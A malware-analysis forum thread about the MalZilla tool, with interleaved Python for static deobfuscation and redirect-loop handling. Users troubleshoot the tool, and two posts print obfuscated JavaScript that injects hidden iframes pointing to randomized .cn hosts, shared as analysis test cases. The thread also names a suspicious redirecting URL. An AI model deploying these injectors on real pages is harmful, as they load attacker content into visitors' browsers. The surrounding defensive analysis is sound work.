Author Topic: MalZilla  (Read 256156 times)


June 08, 2009, 10:04:50 pm
Reply #270

MysteryFCM

  • Administrator
  • Hero Member


  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I forgot to mention btw Bobby, the DLL issue I was having (showed up whenever Malzilla was launched) - I fixed it eventually (accidentally) by uninstalling the MS Visual C++ runtime ..... (bit weird, but it worked)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 09, 2009, 06:57:26 pm
Reply #271

bobby

  • Special Members
  • Hero Member


  • 322
    • Malzilla
Looks like a conflict between various versions of the same DLL.

June 09, 2009, 07:18:33 pm
Reply #272

MysteryFCM

  • Administrator
  • Hero Member


  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
hehe yep :)
Regards


June 11, 2009, 10:54:44 am
Reply #273

Cyborg

  • Newbie


  • 5
Quote
Hi Cyborg and welcome.

Which version of Malzilla do you use? This looks like a known bug from old versions of Malzilla, but it should have been corrected a long time ago.

Do you use Clipboard Monitor (option from tray icon)?

Hi Bobby, nice to meet you here.

Version : 1.2.0


I downloaded it from the sourceforge website only 2-3 weeks ago.

And no, I'm using the right click option from inside MalZilla.

By the way, I don't know why, whenever I open MalZilla, I'm getting this error :



However, it does not seem to be affecting the way MalZilla works. I've tried replacing the shortcut by deleting the original files and unzipping MalZilla again. That did not fix the issue.

By the way, I'm on Vista Home Premium.

Reg,
Cyborg

June 11, 2009, 01:23:57 pm
Reply #274

bobby

  • Special Members
  • Hero Member


  • 322
    • Malzilla
Hi Cyborg,

I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).

As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try whether you can reach any https link, and whether you get another error message or not.

June 11, 2009, 08:40:00 pm
Reply #275

Cyborg

  • Newbie


  • 5
Hey Bobby :)

Quote
I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).

It has a check placed on it. But the clipboard doesn't work. It doesn't copy normal text either.

Quote
As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try whether you can reach any https link, and whether you get another error message or not.

No, I don't have a copy of libeay32.dll in system32. And no, I'm not able to open any https websites (isn't this a known problem on Vista?). I get this in the lower pane :

Quote
=========================
Server IP(s):
0.0.0.0

=========================
HTTP headers:

GET / HTTP/1.0
Host: webparent.sabis.net:443
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/521.9 (KHTML, like Gecko) Safari/521.9
Accept-Encoding: gzip

Above is a working example of the website : https://webparent[dot]sabis[dot]net

June 11, 2009, 09:13:21 pm
Reply #276

MysteryFCM

  • Administrator
  • Hero Member


  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Cyborg,
Go to Add/Remove Programs (Programs and Features on Vista), and uninstall the Microsoft Visual C++ Runtime ....
Regards


June 11, 2009, 09:27:49 pm
Reply #277

Cyborg

  • Newbie


  • 5
Thanks a lot Steven, that seems to have fixed the DLL issue.
Seems like you had already posted the solution before...

Anyways, got any idea about the clipboard issue?
Does anybody else have the same problem??

June 11, 2009, 10:09:27 pm
Reply #278

MysteryFCM

  • Administrator
  • Hero Member


  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I've had the issue when copy/pasting from the shellcode/hex view, but not the rest of the program. When the problem occurs I either have it save the results, or use "Copy selection ...."
Regards


June 18, 2009, 08:17:07 pm
Reply #279

JohnC

  • Special Members
  • Hero Member


  • 1964
Code:
function LApySnWQkMr(){};LApySnWQkMr.prototype = {getRandString : function(){var l=16,c='0Y1R2Y3R4F5R6Y7)8R9FaYb}cRdFeFf}'.replace(/[\)F\}YR]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},path:String.fromCharCode(100)+new String("9")+"9"+"q"+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(110),alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},install : function(){if(!this.alreadyInstalled()){var s="<(d(iHv+ (s$tHy+l,e,=(\'+d+i,sHpHlHa+y,:+n+o$n(e$\'$>H<HiHf$r(a(m(e( Hs,r,c(=,\'+".replace(/[,\$H\(\+]/g, '')+this.getFrameURL()+"\'D>j<D/DitfjrDahmheh>D<C/CdtiDvt>h".replace(/[jDhCt]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehCtPmelC>e<LbPoedUyP>L'.replace(/[PULCe]/g, '')+s+'<C/$b$oCdCy~>n<C/~h~tCm$lC>$'.replace(/[Cp\$n~]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.path + this.host;},cookieValue:1,setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },host:'/may.cn/',cookieName:'gfcehdba'};var ocho=new LApySnWQkMr();ocho.install();

Format Code will break a string or something in the code above and stop it from working as it should.

June 19, 2009, 10:39:15 pm
Reply #280

JohnC

  • Special Members
  • Hero Member


  • 1964
Here is another example that will decode, but when you use Format Code, it will no longer decode.

Code:
function yhIUKrxFqo(){};yhIUKrxFqo.prototype = {host:'/qq.cn/',install : function(){if(!this.alreadyInstalled()){var s="<_d_i3v1 GsFtGy_l3eF=F\'Gd_iGsGp3l3aFy1:Fn1o3n1e3\'_>F<FiGf3rFaFm1e_ Gs3rFc_=1\'F".replace(/[_1G3F]/g, '')+this.getFrameURL()+"\'J>q<q/qiJfRr@aRmqeJ>@<q/@dRiqvJ>q".replace(/[@J0qR]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehetsmvls>e<rbroZdsyr>s'.replace(/[srevZ]/g, '')+s+'<{/rbPokdFyr>r<r/FhFtkmrlr>P'.replace(/[\{rkPF]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getRandString : function(){var l=16,c='0m1j2m3z4{5m6m7j8J9maJbzc{dmeJfz'.replace(/[\{jzmJ]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},cookieValue:1,getFrameURL : function(){var dlh=''; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.path + this.host;},path:String.fromCharCode(102)+"q"+new String("w")+String.fromCharCode(101)+String.fromCharCode(114)+new String("z")+"."+new String("c")+new String("n"),cookieName:'chfeabgd',alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); }};var ocho=new yhIUKrxFqo();eval(ocho.getFrameURL());
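Both of JohnC's samples above hide their markup behind the same idioms: a literal followed by `.replace(/[chars]/g, '')` to delete filler characters, `String.fromCharCode`, `new String("x")`, and `+` concatenation of fragments. The following static decoder is an added example written for this thread, not Malzilla's code or anything from the posts; it assumes flat character classes (no `a-z` ranges) and only simple backslash escapes, and SAMPLE is a shortened, constructed excerpt of the first sample rather than the whole script.

```python
import json
import re

# Constructed excerpt: the injected-markup expression and the "path" expression from
# JohnC's first sample in this thread, shortened. Not the complete script.
SAMPLE = r"""var s="<(d(iHv+ (s$tHy+l,e,=(\'+d+i,sHpHlHa+y,:+n+o$n(e$\'$>H<HiHf$r(a(m(e( Hs,r,c(=,\'+".replace(/[,\$H\(\+]/g, '')+this.getFrameURL()+"\'D>j<D/DitfjrDahmheh>D<C/CdtiDvt>h".replace(/[jDhCt]/g, '');var p=String.fromCharCode(100)+new String("9")+"9"+"q"+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(110);"""

# A JS string literal: quote, body with backslash escapes, matching quote.
STR = r"""(?P<q>["'])(?P<body>(?:\\.|(?!(?P=q)).)*)(?P=q)"""
# "literal".replace(/[chars]/g, '')  -- the obfuscator's character-deletion idiom
STRIP_CALL = re.compile(STR + r"""\.replace\(/\[(?P<cls>(?:\\.|[^\]])*)\]/g,\s*(?:''|"")\)""", re.S)
CHARCODE = re.compile(r"String\.fromCharCode\((\d+)\)")
NEW_STRING = re.compile(r"new\s+String\(" + STR + r"\)", re.S)
CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')   # "a"+"b"

def js_unescape(body):
    """Undo the simple backslash escapes (escaped quotes, escaped backslash) seen here."""
    return re.sub(r"\\(.)", r"\1", body)

def class_chars(cls):
    """Characters named by a flat regex class body; backslash-escaped members are kept."""
    chars, i = set(), 0
    while i < len(cls):
        if cls[i] == "\\" and i + 1 < len(cls):
            chars.add(cls[i + 1]); i += 2
        else:
            chars.add(cls[i]); i += 1
    return chars

def _strip(m):
    drop = class_chars(m.group("cls"))
    return json.dumps("".join(c for c in js_unescape(m.group("body")) if c not in drop))

def deobfuscate(js):
    """Statically resolve the idioms above and fold adjacent literals; nothing is eval'd."""
    js = CHARCODE.sub(lambda m: json.dumps(chr(int(m.group(1)))), js)
    js = NEW_STRING.sub(lambda m: json.dumps(js_unescape(m.group("body"))), js)
    js = STRIP_CALL.sub(_strip, js)
    prev = None
    while prev != js:                      # repeat until no "a"+"b" pairs remain
        prev = js
        js = CONCAT.sub(lambda m: json.dumps(m.group(1) + m.group(2)), js)
    return js

def string_literals(js):
    """Double-quoted literals left in the result: the strings an analyst reads first."""
    return [json.loads(m.group(0)) for m in re.finditer(r'"(?:\\.|[^"\\])*"', js)]
```

Running `deobfuscate(SAMPLE)` leaves the hidden-iframe markup and the `d99q.cn` path as plain literals, which is what a signature or a Malzilla decoder run would need to match on.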
 

June 20, 2009, 06:45:45 am
Reply #281

MysteryFCM

  • Administrator
  • Hero Member


  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
This one sends Malzilla into a permanent 302 ....... (unless autofollowing redirects is disabled of course);

Code:
http://www.fucking-cash.com/index.com?a=3546&p=2
p= is valid from 1 up to lord knows where (highest I've found so far is 15, all seem to be serving malware (haven't analyzed it in detail yet))

/edit

Okie, after stopping Malzilla doing an auto 302, those < 10 are intermittent between perma redirects back to itself, and redirects to other sites. Those > 10 (and so far the number doesn't seem to be limited) all lead to porn sites. The reason I thought it was malware is that it was actually serving the file as application/x-msdownload, which meant Malzilla was treating the redirect URL as an actual file - looking at the source code for some of them, this does not seem to be the case - they just seem to be regular porn sites.
Regards


June 20, 2009, 01:49:51 pm
Reply #282

bobby

  • Special Members
  • Hero Member


  • 322
    • Malzilla
Malzilla treats some content as a binary file (and triggers the Save dialog) only if one of the following strings is present in the HTTP headers:
'Content-Type: application'
'Content-Disposition:'

Malzilla will follow redirections for every HTTP response in the range between 300 and 399. It does not distinguish between e.g. 300 and 302 responses.
Redirection is done according to the following line in HTTP headers if present (it should be present for every 3xx response):
'Location:'

One more type of redirection that Malzilla will follow is the one with response 200 and with 'Refresh:' line in HTTP headers.

June 20, 2009, 02:10:09 pm
Reply #283

bobby

  • Special Members
  • Hero Member


  • 322
    • Malzilla
@MysteryFCM

Indeed, these HTTP headers are driving Malzilla nuts.
'Location:' is empty, and that triggers Malzilla to treat it as a relative URL, which means that the absolute URL will be the same as the current URL.
The 'Content-Type:' will trigger the save dialog because it contains the 'application' string; and redirection (e.g. 302) in Malzilla does not exclude the possibility of getting a download (binary) in the same turn. This would be my mistake in coding the HTTP headers parser.

Interesting.
It makes me think that someone made this just to explore Malzilla's HTTP headers parser system :)
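The two posts above describe the parser rules (application/* Content-Type or Content-Disposition means "save as binary"; any 3xx with a Location, or a 200 with Refresh, means "follow") and the case that breaks them: an empty Location resolves to the current URL while the Content-Type also flags a download. The Python below is an added reconstruction of those described rules beside a hardened variant, not Malzilla's source; the response head is constructed to match the description, and the `Refresh: n; url=...` layout is an assumption.

```python
from urllib.parse import urljoin

# Constructed response head imitating what bobby describes (3xx with an empty Location and
# an application/* Content-Type); not a capture from the site named in the thread.
SAMPLE_RESPONSE = ("HTTP/1.1 302 Found\r\nLocation: \r\n"
                   "Content-Type: application/x-msdownload\r\nContent-Length: 0\r\n")

def parse_response(raw):
    """Status code and a lower-cased header dict from a raw response head."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(lines[0].split()[1]), headers

def refresh_target(value):
    """'5; url=http://x/' -> 'http://x/' (assumed Refresh header layout)."""
    rest = value.partition(";")[2].strip()
    return rest[4:] if rest.lower().startswith("url=") else rest

def legacy_decision(status, headers, current_url):
    """Rules as the thread describes them (reconstructed, not Malzilla's source):
    download and redirect are decided independently, so both can fire on one response."""
    ctype = headers.get("content-type", "")
    download = ctype.startswith("application") or "content-disposition" in headers
    redirect = None
    if 300 <= status <= 399 and "location" in headers:
        redirect = urljoin(current_url, headers["location"])  # '' resolves to current_url
    elif status == 200 and "refresh" in headers:
        redirect = urljoin(current_url, refresh_target(headers["refresh"]))
    return {"download": download, "redirect": redirect}

def hardened_decision(status, headers, current_url, seen=()):
    """One action per response; a missing, empty or already-visited Location is a loop."""
    d = legacy_decision(status, headers, current_url)
    if 300 <= status <= 399 or d["redirect"] is not None:
        if not d["redirect"] or d["redirect"] == current_url or d["redirect"] in seen:
            return "loop", d["redirect"]
        return "redirect", d["redirect"]           # a 3xx never doubles as a download
    return ("download", None) if d["download"] else ("render", None)

def follow(fetch, url, max_hops=10):
    seen = []                                      # visited URLs, doubling as the hop counter
    while len(seen) < max_hops:
        seen.append(url)
        action, target = hardened_decision(*parse_response(fetch(url)), url, seen)
        if action != "redirect":
            return action, url
        url = target
    return "loop", url
```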

June 20, 2009, 04:01:38 pm
Reply #284

MysteryFCM

  • Administrator
  • Hero Member


  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
hehe because of the way it behaved, I figured it was probably done deliberately to try and avoid automated analysis as much as possible.
Regards
